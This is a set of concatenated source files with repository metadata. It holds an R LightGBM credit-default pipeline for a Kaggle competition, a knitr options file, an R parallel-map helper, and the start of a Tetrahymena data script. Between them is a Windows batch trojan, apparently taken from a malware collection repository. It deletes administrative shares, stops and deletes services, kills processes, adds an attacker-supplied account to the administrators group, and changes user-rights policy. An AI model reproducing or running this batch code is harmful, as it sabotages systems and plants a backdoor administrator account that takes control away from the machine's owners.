early_stopping_round = 200,
valids = list(train = dval),
#nfold = 5, #unknown parameter
#stratified = TRUE, #unknown parameter
verbose = 2)
lgbm_pred_list[[i]] = predict(m_gbm_cv, dtest)
lgbm_feat = rbindlist(list(lgbm_feat, lgb.importance(m_gbm_cv, percentage = TRUE)))
}
# Average the per-run predictions. Divide by the number of prediction vectors
# actually collected rather than the leaked loop index `i`, which is only
# correct when the preceding for-loop ran to completion.
avg_lgbm = Reduce(`+`, lgbm_pred_list) / length(lgbm_pred_list)
lgbm_feat_avg = lgbm_feat %>% group_by(Feature) %>%
summarize(gain_avg = mean(Gain),
cover_avg = mean(Cover),
frequency_avg = mean(Frequency))
#---------------------------
read_csv(file.path(data_dir, "//Models//sample_submission.csv")) %>%
mutate(SK_ID_CURR = as.integer(SK_ID_CURR),
TARGET = avg_lgbm) %>%
write_csv(file.path(data_dir, paste0("//Models//new_mod_", round(m_gbm_cv$best_score, 5), ".csv")))
# write file with characteristic parameters
write_csv(lgbm_feat_avg, file.path(data_dir, paste0("//Results//new_mod_", round(m_gbm_cv$best_score, 5), "_importance.csv")))
| /homecredit/LightGBM_new.R | no_license | Eovil246O1/R | R | false | false | 18,764 | r | library(magrittr)
library(lightgbm)
library(moments)
library(data.table)
library(recommenderlab)
library(tidyverse)
#---------------------------
cat("Loading data...\n")
data_dir = "C:\\Users\\Viacheslav_Pyrohov\\Desktop\\Kaggle_Homecredit competition"
tr <- read_csv(file.path(data_dir, "application_train.csv"))
te <- read_csv(file.path(data_dir, "application_test.csv"))
#---------------------------
cat("Preprocessing...\n")
fn <- funs(mean, sd, min, max, sum, n_distinct, .args = list(na.rm = TRUE))
time_coef = log(0.5)/(-24) #apply weight coefficient to historical data, coef = 0.5 weight for 24 month ago
#---------------------------
cat("Preprocessing bureau_balance.csv...\n")
bbalance <- read_csv(file.path(data_dir, "bureau_balance.csv"))
# IMPORTANT! This part has low gain at the moment - check showed that old algorythm gave sum gain of 0.03234, new - 0.0457
sum_bbalance <- bbalance %>%
#to improve: treat warnings
#to do: delete redundant variables
#to do: to make sure that new approach works validate against the same number of features!
filter(!STATUS %in% 'X') %>% #filter out STATUS == 'X' as this mean absense of data
mutate(STATUS = if_else(STATUS == 'C', -1, as.numeric(STATUS)), #treat 'C' = closed as -1 #this returns warning, but the result is OK and validated
STATUS_WEIGHTED = exp(time_coef*(MONTHS_BALANCE))*STATUS) %>%
group_by(SK_ID_BUREAU) %>%
mutate(START_STATUS = first(STATUS, MONTHS_BALANCE),
END_STATUS = last(STATUS, MONTHS_BALANCE)) %>%
summarise_all(fn)
rm(bbalance); gc()
# old approach
# sum_bbalance <- bbalance %>%
# mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
# group_by(SK_ID_BUREAU) %>%
# summarise_all(fn)
# rm(bbalance); gc()
#---------------------------
cat("Preprocessing bureau.csv...\n")
bureau <- read_csv(file.path(data_dir, "bureau.csv"))
bureau <- bureau %>% #to do: validate if this approach gives gain
mutate(CREDIT_ACTIVE_BOOL = if_else(CREDIT_ACTIVE == 'Active', 1, 0),
CREDIT_CLOSED_BOOL = if_else(CREDIT_ACTIVE == 'Closed', 1, 0),
CREDIT_SOLD_BOOL = if_else(CREDIT_ACTIVE %in% c('Sold','Bad debt'), 1, 0),
CREDIT_UNTYPICAL_CURRENCY = if_else(CREDIT_CURRENCY != 'currency 1', 1, 0)) %>% #old approach could be better - check
select(-c(CREDIT_ACTIVE, CREDIT_CURRENCY))
# table(sum_bureau_test$CREDIT_CURRENCY) #currently continue working on bureau data
sum_bureau <- bureau %>%
left_join(sum_bbalance, by = "SK_ID_BUREAU") %>%
select(-SK_ID_BUREAU) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
group_by(SK_ID_CURR) %>%
summarise_all(fn)
rm(bureau, sum_bbalance); gc()
#---------------------------
cat("Preprocessing credit_card_balance.csv...\n")
cc_balance <- read_csv(file.path(data_dir, "credit_card_balance.csv"))
sum_cc_balance <- cc_balance %>%
select(-SK_ID_PREV) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
group_by(SK_ID_CURR) %>%
summarise_all(fn)
agr_prev_cc_balance <- cc_balance %>%
select(-SK_ID_CURR) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
group_by(SK_ID_PREV) %>%
summarise_all(funs(mean(., na.rm = TRUE)))
rm(cc_balance); gc()
#---------------------------
cat("Preprocessing installments_payments.csv...\n")
payments <- read_csv(file.path(data_dir, "installments_payments.csv"))
sum_payments <- payments %>%
select(-SK_ID_PREV) %>%
mutate(PAYMENT_PERC = AMT_PAYMENT / AMT_INSTALMENT,
PAYMENT_DIFF = AMT_INSTALMENT - AMT_PAYMENT,
DPD = DAYS_ENTRY_PAYMENT - DAYS_INSTALMENT,
DBD = DAYS_INSTALMENT - DAYS_ENTRY_PAYMENT,
DPD = ifelse(DPD > 0, DPD, 0),
DBD = ifelse(DBD > 0, DBD, 0)) %>%
group_by(SK_ID_CURR) %>%
summarise_all(fn)
agr_prev_payments <- payments %>%
select(-SK_ID_CURR) %>%
mutate(PAYMENT_PERC = AMT_PAYMENT / AMT_INSTALMENT,
PAYMENT_DIFF = AMT_INSTALMENT - AMT_PAYMENT,
DPD = DAYS_ENTRY_PAYMENT - DAYS_INSTALMENT,
DBD = DAYS_INSTALMENT - DAYS_ENTRY_PAYMENT,
DPD = ifelse(DPD > 0, DPD, 0),
DBD = ifelse(DBD > 0, DBD, 0)) %>%
group_by(SK_ID_PREV) %>%
summarise_all(funs(mean(., na.rm = TRUE)))
rm(payments); gc()
#---------------------------
cat("Preprocessing POS_CASH_balance.csv...\n")
pc_balance <- read_csv(file.path(data_dir, "POS_CASH_balance.csv"))
sum_pc_balance <- pc_balance %>%
select(-SK_ID_PREV) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
group_by(SK_ID_CURR) %>%
summarise_all(fn)
agr_prev_pc_balance <- pc_balance %>%
select(-SK_ID_CURR) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
group_by(SK_ID_PREV) %>%
summarise_all(funs(mean(., na.rm = TRUE)))
rm(pc_balance); gc()
#---------------------------
cat("Preprocessing previous_application.csv...\n")
prev <- read_csv(file.path(data_dir, "previous_application.csv"))
sum_prev <- prev %>%
#left_join(agr_prev_cc_balance, by = "SK_ID_PREV") %>% #to do: check if gives gain
#left_join(agr_prev_payments, by = "SK_ID_PREV") %>% #to do: check if gives gain
#left_join(agr_prev_pc_balance, by = "SK_ID_PREV") %>% #to do: check if gives gain
select(-SK_ID_PREV) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
mutate(DAYS_FIRST_DRAWING = ifelse(DAYS_FIRST_DRAWING == 365243, NA, DAYS_FIRST_DRAWING),
DAYS_FIRST_DUE = ifelse(DAYS_FIRST_DUE == 365243, NA, DAYS_FIRST_DUE),
DAYS_LAST_DUE_1ST_VERSION = ifelse(DAYS_LAST_DUE_1ST_VERSION == 365243, NA, DAYS_LAST_DUE_1ST_VERSION),
DAYS_LAST_DUE = ifelse(DAYS_LAST_DUE == 365243, NA, DAYS_LAST_DUE),
DAYS_TERMINATION = ifelse(DAYS_TERMINATION == 365243, NA, DAYS_TERMINATION),
APP_CREDIT_PERC = AMT_APPLICATION / AMT_CREDIT) %>%
group_by(SK_ID_CURR) %>%
summarise_all(fn)
rm(prev, agr_prev_cc_balance, agr_prev_payments, agr_prev_pc_balance); gc()
tri <- 1:nrow(tr)
y <- tr$TARGET
tr_te <- tr %>%
select(-TARGET) %>%
bind_rows(te) %>%
left_join(sum_bureau, by = "SK_ID_CURR") %>%
left_join(sum_cc_balance, by = "SK_ID_CURR") %>%
left_join(sum_payments, by = "SK_ID_CURR") %>%
left_join(sum_pc_balance, by = "SK_ID_CURR") %>%
left_join(sum_prev, by = "SK_ID_CURR") %>%
select(-SK_ID_CURR) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
mutate(na = apply(., 1, function(x) sum(is.na(x))),
DAYS_EMPLOYED = ifelse(DAYS_EMPLOYED == 365243, NA, DAYS_EMPLOYED),
DAYS_EMPLOYED_PERC = sqrt(DAYS_EMPLOYED / DAYS_BIRTH),
INCOME_CREDIT_PERC = AMT_INCOME_TOTAL / AMT_CREDIT,
INCOME_PER_PERSON = log1p(AMT_INCOME_TOTAL / CNT_FAM_MEMBERS),
ANNUITY_INCOME_PERC = sqrt(AMT_ANNUITY / (1 + AMT_INCOME_TOTAL)),
LOAN_INCOME_RATIO = AMT_CREDIT / AMT_INCOME_TOTAL,
ANNUITY_LENGTH = AMT_CREDIT / AMT_ANNUITY,
CHILDREN_RATIO = CNT_CHILDREN / CNT_FAM_MEMBERS,
CREDIT_TO_GOODS_RATIO = AMT_CREDIT / AMT_GOODS_PRICE,
INC_PER_CHLD = AMT_INCOME_TOTAL / (1 + CNT_CHILDREN),
SOURCES_PROD = EXT_SOURCE_1 * EXT_SOURCE_2 * EXT_SOURCE_3,
CAR_TO_BIRTH_RATIO = OWN_CAR_AGE / DAYS_BIRTH,
CAR_TO_EMPLOY_RATIO = OWN_CAR_AGE / DAYS_EMPLOYED,
PHONE_TO_BIRTH_RATIO = DAYS_LAST_PHONE_CHANGE / DAYS_BIRTH,
PHONE_TO_EMPLOY_RATIO = DAYS_LAST_PHONE_CHANGE / DAYS_EMPLOYED
# add features from corr check loop
#AMT_DRAWINGS_OTHER_CURRENT_mean + DAYS_LAST_DUE_mean, # new corr = 0.086, diff = 0.059 #inefficient = 3.64E-04 on real data
#DAYS_LAST_DUE_mean + AMT_DRAWINGS_OTHER_CURRENT_sd, # new corr = 0.0856, diff = 0.0586 #inefficient = 4E-04 on real data
#CNT_DRAWINGS_OTHER_CURRENT_mean + CNT_INSTALMENT_MATURE_CUM_mean, # new corr = -0.084, diff = 0.0555 #inefficient = 1.66E-04 on real data
#AMT_PAYMENT_CURRENT_mean + DAYS_LAST_DUE_mean, # new corr = 0.08, diff = 0.05385 #inefficient = 0.00036 on real data
#AMT_CREDIT_SUM_max + RATE_INTEREST_PRIMARY_sd, # new corr = 0.31, check this carefully #inefficient on real data
#AMT_ANNUITY_min.y + RATE_INTEREST_PRIVILEGED_sd, # new corr = 0.13, check this carefully #inefficient on real data
#RATE_INTEREST_PRIMARY_NA = if_else(is.na(RATE_INTEREST_PRIMARY_mean) | is.nan(RATE_INTEREST_PRIMARY_mean), 0, 1), #added by intuition #inefficient on real data
#RATE_INTEREST_PRIVILEGED_NA = if_else(is.na(RATE_INTEREST_PRIVILEGED_mean) | is.nan(RATE_INTEREST_PRIVILEGED_mean), 0, 1) #added by intuition #inefficient on real data
) %>%
select(-one_of(drop_cols))
docs <- str_subset(names(tr), "FLAG_DOC")
live <- str_subset(names(tr), "(?!NFLAG_)(?!FLAG_DOC)(?!_FLAG_)FLAG_")
inc_by_org <- tr_te %>%
group_by(ORGANIZATION_TYPE) %>%
summarise(m = median(AMT_INCOME_TOTAL)) %$%
setNames(as.list(m), ORGANIZATION_TYPE)
rm(tr, te, fn, sum_bureau, sum_cc_balance,
sum_payments, sum_pc_balance, sum_prev); gc()
tr_te %<>%
mutate(DOC_IND_KURT = apply(tr_te[, docs], 1, moments::kurtosis),
LIVE_IND_SUM = apply(tr_te[, live], 1, sum),
NEW_INC_BY_ORG = dplyr::recode(tr_te$ORGANIZATION_TYPE, !!!inc_by_org),
NEW_EXT_SOURCES_MEAN = apply(tr_te[, c("EXT_SOURCE_1", "EXT_SOURCE_2", "EXT_SOURCE_3")], 1, mean),
NEW_SCORES_STD = apply(tr_te[, c("EXT_SOURCE_1", "EXT_SOURCE_2", "EXT_SOURCE_3")], 1, sd))%>%
mutate_all(funs(ifelse(is.nan(.), NA, .))) %>%
mutate_all(funs(ifelse(is.infinite(.), NA, .))) %>%
data.matrix()
#---------------------------
cat("Save & load dataset...\n")
save(tr_te, file = paste0(data_dir, "//Calculation//input_bigmatrix_short.RData"), version = NULL)
save(tri, file = paste0(data_dir, "//Calculation//input_tri.RData"), version = NULL)
save(y, file = paste0(data_dir, "//Calculation//input_y.RData"), version = NULL)
#load(file = paste0(data_dir, "//Calculation//input_bigmatrix_short.RData"), .GlobalEnv)
#load(file = paste0(data_dir, "//Calculation//input_tri.RData"), .GlobalEnv)
#load(file = paste0(data_dir, "//Calculation//input_y.RData"), .GlobalEnv)
gc()
#---------------------------
cat("Create additional variables...\n")
tr_te = as.data.table(tr_te); gc()
#
# # create vars for NaN observations
# # CONCLUSION: NAs already treated by na feature which is enough predicative
# #col_num = ncol(tr_te)
# #for (i in 3:col_num) {
# # colname = names(tr_te)[i]
# # tr_te[is.na(eval(as.name(colname)))|is.nan(eval(as.name(colname)))|is.null(eval(as.name(colname)))|is.infinite(eval(as.name(colname))),
# # paste0(colname, '_nulls') := 1]
# # #tr_te[is.na(eval(as.name(paste0(colname, '_nulls')))), paste0(colname, '_nulls') := 0]
# #}
#
# # outliers marking
# outliers_remove = function(dt,col_from,col_to) {
# for (i in col_from:col_to) {
# colname = names(dt)[i]
# qnt <- quantile(dt[,eval(as.name(colname))], probs=c(.25, .75), na.rm = T)
# H <- 1.5 * (qnt[2]-qnt[1])
# dt[eval(as.name(colname)) < (qnt[1] - H), paste0(colname, '_outliers') := -1]
# dt[eval(as.name(colname)) > (qnt[2] + H), paste0(colname, '_outliers') := 1]
# #dt[is.na(eval(as.name(paste0(colname, '_outliers')))), paste0(colname, '_outliers') := 0]
# }
# return(as.data.table(dt))
# }
#
# tr_te = outliers_remove(tr_te, col_from = 3, col_to = col_num)
# gc()
# apply random models
# IMPORTANT! It seems that this approach really works. Check file 2rand_cols...csv
vect_fla = c('y ~ CNT_PAYMENT_max + NAME_CONTRACT_STATUS_sum.y',
'y ~ REGION_RATING_CLIENT_W_CITY + AMT_APPLICATION_mean',
'y ~ DPD_n_distinct + LIVE_REGION_NOT_WORK_REGION + NAME_EDUCATION_TYPE',
'y ~ DAYS_INSTALMENT_min + NAME_INCOME_TYPE + CODE_REJECT_REASON_min',
'y ~ FLAG_DOCUMENT_7 + DAYS_ENTRY_PAYMENT_sd + FLAG_DOCUMENT_3',
'y ~ CREDIT_ACTIVE_BOOL_sum + DAYS_CREDIT_mean'
)
list_params = list(c('CNT_PAYMENT_max', 'NAME_CONTRACT_STATUS_sum.y'),
c('REGION_RATING_CLIENT_W_CITY', 'AMT_APPLICATION_mean'),
c('DPD_n_distinct', 'LIVE_REGION_NOT_WORK_REGION', 'NAME_EDUCATION_TYPE'),
c('DAYS_INSTALMENT_min', 'NAME_INCOME_TYPE', 'CODE_REJECT_REASON_min'),
c('FLAG_DOCUMENT_7', 'DAYS_ENTRY_PAYMENT_sd', 'FLAG_DOCUMENT_3'),
c('CREDIT_ACTIVE_BOOL_sum', 'DAYS_CREDIT_mean')
)
# For each hand-picked formula, fit a linear model on the training rows and
# append its predictions over the full dataset as a new feature column.
# seq_along() is used instead of 1:length(): with an empty vector the latter
# yields c(1, 0) and would iterate twice with invalid indices.
for (i in seq_along(vect_fla)) {
  fla = vect_fla[i]
  params = list_params[[i]]
  # apply model: fit on labelled rows only (first length(y) rows are train)
  dt_mod = as.data.table(cbind(y, tr_te[seq_along(y), params, with = FALSE]))
  mod = lm(data = dt_mod, formula = as.formula(fla)) #to do: add random model here
  tr_te[, paste0('newcol','_', sub('y ~ ', '', fla)) := predict(mod, tr_te[, params, with = FALSE])]
}
rm(fla, params, vect_fla, list_params, dt_mod, mod); gc()
# create matrix from dt without RAM issues
# original article with the method could be found here:
# https://medium.com/data-design/loading-super-large-sparse-data-when-you-cant-load-as-sparse-in-r-2a9f0ad927b2
temp_names = colnames(tr_te)
write_csv(as.data.frame(temp_names), path = paste0(data_dir, "//Calculation//input_colnames.csv"), col_names = TRUE)
write_csv(tr_te, path = paste0(data_dir, "//Calculation//input_bigmatrix.csv"), col_names = TRUE)
temp_names = read.csv(file = paste0(data_dir, "//Calculation//input_colnames.csv"))
rm(tr_te); gc()
n = 10 #set number of parts to split
for (i in 1:n) {
cat("Loading ", i, "th part.\n", sep = "")
train_data_temp <- fread(input = paste0(data_dir, "//Calculation//input_bigmatrix.csv"),
select = (1+round((i-1)*nrow(temp_names)/n, 0)):round(i*nrow(temp_names)/n, 0),
header = TRUE,
sep = ",",
stringsAsFactors = FALSE,
colClasses = rep("numeric", nrow(temp_names)),
data.table = TRUE)
gc(verbose = FALSE)
if (i > 1) {
cat("Coercing to matrix.\n", sep = "")
tr_te_temp <- as.matrix(train_data_temp)
rm(train_data_temp)
gc(verbose = FALSE)
cat("Coercing into dgCMatrix with NA as blank.\n", sep = "")
tr_te_temp <- dropNA(tr_te_temp)
gc(verbose = FALSE)
cat("Column binding the full matrix with the newly created matrix.\n", sep = "")
tr_te <- cbind(tr_te, tr_te_temp)
rm(tr_te_temp)
gc(verbose = FALSE)
} else {
cat("Coercing to matrix.\n", sep = "")
tr_te_temp <- as.matrix(train_data_temp)
rm(train_data_temp)
gc(verbose = FALSE)
cat("Coercing into dgCMatrix with NA as blank.\n", sep = "")
tr_te <- dropNA(tr_te_temp)
gc(verbose = FALSE)
}
}
gc()
#---------------------------
cat("Save & load long dataset...\n")
saveRDS(tr_te, file = paste0(data_dir, "//Calculation//input_bigmatrix_long.rds"))
#---------------------------
lgbm_feat = data.table(Feature = character(), Gain = numeric(), Cover = numeric(), Frequency = numeric())
lgbm_pred_list = list()
cat("Preparing data...\n")
for (i in 1:5) {
tr_te = readRDS(paste0(data_dir, "//Calculation//input_bigmatrix_long.rds"))
load(file = paste0(data_dir, "//Calculation//input_tri.RData"), .GlobalEnv)
load(file = paste0(data_dir, "//Calculation//input_y.RData"), .GlobalEnv)
#dtest <- lgb.Dataset(data = tr_te[-tri, ]) #it seems that this approach do not work for LightGBM. Raise questions for this.
dtest <- tr_te[-tri, ]
tr_te <- tr_te[tri, ]
tri <- caret::createDataPartition(y, p = 0.9, list = F) %>% c()
dtrain = lgb.Dataset(data = tr_te[tri, ], label = y[tri])
dval = lgb.Dataset(data = tr_te[-tri, ], label = y[-tri])
cols <- colnames(tr_te)
rm(tr_te, y, tri); gc()
#---------------------------
cat("Training model...\n")
# parameters taken from https://www.kaggle.com/dromosys/fork-of-fork-lightgbm-with-simple-features-cee847/code
#lgb.grid = list(objective = "binary",
# metric = "auc",
# #n_estimators=10000,
# learning_rate=0.02, # in source - 0.02
# num_leaves=32,
# colsample_bytree=0.9497036,
# subsample=0.8715623,
# max_depth=8,
# reg_alpha=0.04,
# reg_lambda=0.073,
# min_split_gain=0.0222415,
# min_child_weight=40,
# is_unbalance = TRUE)
lgb.grid = list(objective = "binary",
metric = "auc",
learning_rate=0.02, # in source - 0.02
num_leaves=127,
#colsample_bytree=0.9497036,
#subsample=0.8715623,
#max_depth=8,
#reg_alpha=0.04,
#reg_lambda=0.073,
#min_split_gain=0.0222415,
#min_child_weight=40,
feature_fraction = 0.6, #originaly 0.5
bagging_freq = 1,
bagging_fraction = 0.8,
use_missing = TRUE,
is_unbalance = TRUE)
m_gbm_cv = lgb.train(params = lgb.grid,
data = dtrain,
num_threads = 10,
nrounds = 5,
eval_freq = 20,
#boosting = 'dart', # todo: check the difference
#num_leaves = 255, # typical: 255, usually {15, 31, 63, 127, 255, 511, 1023, 2047, 4095}.
#eval = "binary_error", #can place own validation function here #unknown parameter
#categorical_feature = categoricals.vec,
num_iterations = 2000, #2000, equivalent of n_estimators
early_stopping_round = 200,
valids = list(train = dval),
#nfold = 5, #unknown parameter
#stratified = TRUE, #unknown parameter
verbose = 2)
lgbm_pred_list[[i]] = predict(m_gbm_cv, dtest)
lgbm_feat = rbindlist(list(lgbm_feat, lgb.importance(m_gbm_cv, percentage = TRUE)))
}
# Average the per-run predictions. Divide by the number of prediction vectors
# actually collected rather than the leaked loop index `i`, which is only
# correct when the preceding for-loop ran to completion.
avg_lgbm = Reduce(`+`, lgbm_pred_list) / length(lgbm_pred_list)
lgbm_feat_avg = lgbm_feat %>% group_by(Feature) %>%
summarize(gain_avg = mean(Gain),
cover_avg = mean(Cover),
frequency_avg = mean(Frequency))
#---------------------------
read_csv(file.path(data_dir, "//Models//sample_submission.csv")) %>%
mutate(SK_ID_CURR = as.integer(SK_ID_CURR),
TARGET = avg_lgbm) %>%
write_csv(file.path(data_dir, paste0("//Models//new_mod_", round(m_gbm_cv$best_score, 5), ".csv")))
# write file with characteristic parameters
write_csv(lgbm_feat_avg, file.path(data_dir, paste0("//Results//new_mod_", round(m_gbm_cv$best_score, 5), "_importance.csv")))
|
# Project-wide knitr chunk defaults: hide source code, suppress errors,
# messages and warnings, and route figures to a per-document directory.
# NOTE(review): `DOCNAME` must be defined by the calling document before this
# file is sourced -- it namespaces the figure output path. Confirm every
# consumer sets it.
knitr::opts_chunk$set(
  echo = FALSE,
  error = FALSE,
  fig.align = "center",
  fig.path = paste0("figures/", DOCNAME, "/"),
  fig.width = 10,
  fig.height = 8,
  message = FALSE,
  warning = FALSE
)
| /R/knitr-options.R | permissive | lazappi/twitter-stats | R | false | false | 239 | r | knitr::opts_chunk$set(
echo = FALSE,
error = FALSE,
fig.align = "center",
fig.path = paste0("figures/", DOCNAME, "/"),
fig.width = 10,
fig.height = 8,
message = FALSE,
warning = FALSE
)
|
net share A$ /delete /y
net share B$ /delete /y
net share C$ /delete /y
net share D$ /delete /y
net share E$ /delete /y
net share F$ /delete /y
net share G$ /delete /y
net share H$ /delete /y
net share I$ /delete /y
net share J$ /delete /y
net share K$ /delete /y
net share K$ /delete /y
net share L$ /delete /y
net share M$ /delete /y
net share N$ /delete /y
net share O$ /delete /y
net share P$ /delete /y
net share Q$ /delete /y
net share R$ /delete /y
net share S$ /delete /y
net share T$ /delete /y
net share U$ /delete /y
net share V$ /delete /y
net share W$ /delete /y
net share X$ /delete /y
net share Y$ /delete /y
net share Z$ /delete /y
net share ADMIN$ /delete /y
net share IPC$ /delete /y
net share /delete ADMIN$
net share /delete IPC$
net stop "Remote Registry Service"
net stop "Computer Browser"
net stop "server" >> server.txt
net stop "REMOTE PROCEDURE CALL"
net stop "REMOTE PROCEDURE CALL SERVICE"
net stop "Remote Access Connection Manager"
net stop "DameWare Mini Control"
net stop "telnet"
net stop "psexecv"
net stop "messenger"
net stop "netbios"
net stop netbios
kill dntu.exe
kill dntu26.exe
kill dwrcs.exe
sc stop systemnt
sc delete systemnt
sc stop ab
sc delete ab
sc stop evente
sc delete evente
sc stop ntsys
sc delete ntsys
sc stop startdll
sc delete startdll
sc stop MSVC5
sc delete MSVC5
sc stop QOS
sc delete QOS
sc stop MMTASK
sc delete MMTASK
sc stop radmm
sc delete radmm
sc stop mstsk64
sc delete mstsk64
sc stop netsecure
sc delete netsecure
sc stop svcserv
sc delete svcserv
sc stop Slave
sc delete Slave
sc stop svcirof
sc delete svcirof
sc stop csrsss
sc delete csrsss
sc stop keyboard
sc delete keyboard
sc stop shell32
sc delete shell32
sc stop csrss2
sc delete csrss2
sc stop evente
sc delete evente
sc stop eventer
sc delete eventer
sc stop event
sc delete event
sc stop event2
sc delete event2
sc stop systemnt
sc delete systemnt
sc stop dll32
sc delete dll32
sc stop rcmd
sc delete rcmd
sc stop sysmgmt
sc delete sysmgmt
sc stop system
sc delete system
sc stop r_server
sc delete r_server
sc stop radmm
sc delete radmm
sc stop ftp
sc delete ftp
sc stop ir
sc delete ir
sc stop identd
sc delete identd
sc stop net33
sc delete net32
sc stop DWMRCS
sc delete DWMRCS
sc stop svchost
sc delete svchost
sc stop slimftpd
sc delete slimftpd
net user /delete mShelp
REM###
net user /add %1 %2
REM###
net localgroup administrators %1 /add
REM###
secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp
del %SystemRoot%\system32\login.cmd
| /Bat/Trojan.BAT.NoShare.r | permissive | TheWover/Family | R | false | false | 2,724 | r | net share A$ /delete /y
net share B$ /delete /y
net share C$ /delete /y
net share D$ /delete /y
net share E$ /delete /y
net share F$ /delete /y
net share G$ /delete /y
net share H$ /delete /y
net share I$ /delete /y
net share J$ /delete /y
net share K$ /delete /y
net share K$ /delete /y
net share L$ /delete /y
net share M$ /delete /y
net share N$ /delete /y
net share O$ /delete /y
net share P$ /delete /y
net share Q$ /delete /y
net share R$ /delete /y
net share S$ /delete /y
net share T$ /delete /y
net share U$ /delete /y
net share V$ /delete /y
net share W$ /delete /y
net share X$ /delete /y
net share Y$ /delete /y
net share Z$ /delete /y
net share ADMIN$ /delete /y
net share IPC$ /delete /y
net share /delete ADMIN$
net share /delete IPC$
net stop "Remote Registry Service"
net stop "Computer Browser"
net stop "server" >> server.txt
net stop "REMOTE PROCEDURE CALL"
net stop "REMOTE PROCEDURE CALL SERVICE"
net stop "Remote Access Connection Manager"
net stop "DameWare Mini Control"
net stop "telnet"
net stop "psexecv"
net stop "messenger"
net stop "netbios"
net stop netbios
kill dntu.exe
kill dntu26.exe
kill dwrcs.exe
sc stop systemnt
sc delete systemnt
sc stop ab
sc delete ab
sc stop evente
sc delete evente
sc stop ntsys
sc delete ntsys
sc stop startdll
sc delete startdll
sc stop MSVC5
sc delete MSVC5
sc stop QOS
sc delete QOS
sc stop MMTASK
sc delete MMTASK
sc stop radmm
sc delete radmm
sc stop mstsk64
sc delete mstsk64
sc stop netsecure
sc delete netsecure
sc stop svcserv
sc delete svcserv
sc stop Slave
sc delete Slave
sc stop svcirof
sc delete svcirof
sc stop csrsss
sc delete csrsss
sc stop keyboard
sc delete keyboard
sc stop shell32
sc delete shell32
sc stop csrss2
sc delete csrss2
sc stop evente
sc delete evente
sc stop eventer
sc delete eventer
sc stop event
sc delete event
sc stop event2
sc delete event2
sc stop systemnt
sc delete systemnt
sc stop dll32
sc delete dll32
sc stop rcmd
sc delete rcmd
sc stop sysmgmt
sc delete sysmgmt
sc stop system
sc delete system
sc stop r_server
sc delete r_server
sc stop radmm
sc delete radmm
sc stop ftp
sc delete ftp
sc stop ir
sc delete ir
sc stop identd
sc delete identd
sc stop net33
sc delete net32
sc stop DWMRCS
sc delete DWMRCS
sc stop svchost
sc delete svchost
sc stop slimftpd
sc delete slimftpd
net user /delete mShelp
REM###
net user /add %1 %2
REM###
net localgroup administrators %1 /add
REM###
secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp
del %SystemRoot%\system32\login.cmd
|
#' Parallel execution in the purrr::map style
#'
#' @description
#' `mcmap()` is a variant of [parallel::mclapply()] that accepts a formula as `.f`.
#' @inheritParams purrr::map
#' @param .mc.cores integer. Number of worker processes; defaults to
#'   `getOption("mc.cores", 2L)`.
#' @rdname parallel
#' @export
mcmap = function(.x, .f, ..., .mc.cores = getOption("mc.cores", 2L)) {
  # Coerce formulas / character shortcuts to a real function before dispatch.
  .fun = rlang::as_function(.f)
  parallel::mclapply(.x, .fun, ..., mc.cores = .mc.cores)
}
#' @rdname parallel
#' @export
mcmap_lgl = function(.x, .f, ..., .mc.cores = getOption("mc.cores", 2L)) {
  res = mcmap(.x, .f, ..., .mc.cores = .mc.cores)
  purrr::list_simplify(res, ptype = logical(1L))
}
#' @rdname parallel
#' @export
mcmap_int = function(.x, .f, ..., .mc.cores = getOption("mc.cores", 2L)) {
  res = mcmap(.x, .f, ..., .mc.cores = .mc.cores)
  purrr::list_simplify(res, ptype = integer(1L))
}
#' @rdname parallel
#' @export
mcmap_dbl = function(.x, .f, ..., .mc.cores = getOption("mc.cores", 2L)) {
  res = mcmap(.x, .f, ..., .mc.cores = .mc.cores)
  purrr::list_simplify(res, ptype = double(1L))
}
#' @rdname parallel
#' @export
mcmap_chr = function(.x, .f, ..., .mc.cores = getOption("mc.cores", 2L)) {
  res = mcmap(.x, .f, ..., .mc.cores = .mc.cores)
  purrr::list_simplify(res, ptype = character(1L))
}
| /R/parallel.R | permissive | heavywatal/rwtl | R | false | false | 1,171 | r | #' Parallel execution in the purrr::map style
#'
#' @description
#' `mcmap()` is a variant of [parallel::mclapply()] that accepts a formula as `.f`.
#' @inheritParams purrr::map
#' @param .mc.cores integer
#' @rdname parallel
#' @export
mcmap = function(.x, .f, ..., .mc.cores = getOption("mc.cores", 2L)) {
parallel::mclapply(.x, rlang::as_function(.f), ..., mc.cores = .mc.cores)
}
#' @rdname parallel
#' @export
mcmap_lgl = function(.x, .f, ..., .mc.cores = getOption("mc.cores", 2L)) {
purrr::list_simplify(mcmap(.x, .f, ..., .mc.cores = .mc.cores), ptype = logical(1L))
}
#' @rdname parallel
#' @export
mcmap_int = function(.x, .f, ..., .mc.cores = getOption("mc.cores", 2L)) {
purrr::list_simplify(mcmap(.x, .f, ..., .mc.cores = .mc.cores), ptype = integer(1L))
}
#' @rdname parallel
#' @export
mcmap_dbl = function(.x, .f, ..., .mc.cores = getOption("mc.cores", 2L)) {
purrr::list_simplify(mcmap(.x, .f, ..., .mc.cores = .mc.cores), ptype = double(1L))
}
#' @rdname parallel
#' @export
mcmap_chr = function(.x, .f, ..., .mc.cores = getOption("mc.cores", 2L)) {
purrr::list_simplify(mcmap(.x, .f, ..., .mc.cores = .mc.cores), ptype = character(1L))
}
|
# Tetrahymena cell-size analysis: load the raw measurements, drop
# small-diameter rows, summarise by grouping variables, and plot
# log-concentration against log-diameter with per-group regression lines.
#install.packages("tidyverse")
#install.packages("dplyr")
#install.packages("ggplot2")
# Load dplyr for the data-manipulation verbs (group_by / summarise_all).
library("dplyr")
# Load ggplot2 for plotting.
library(ggplot2)
# Load the tidyverse meta-package; readr is attached explicitly as well.
library("tidyverse")
library("readr")
# Step 1: read the tab-separated input file.
# NOTE(review): assumes tetrahymena.tsv is in the working directory -- confirm.
mydata <- read_tsv("tetrahymena.tsv")
View(mydata)
# Step 2: drop rows whose diameter is <= 19.2.
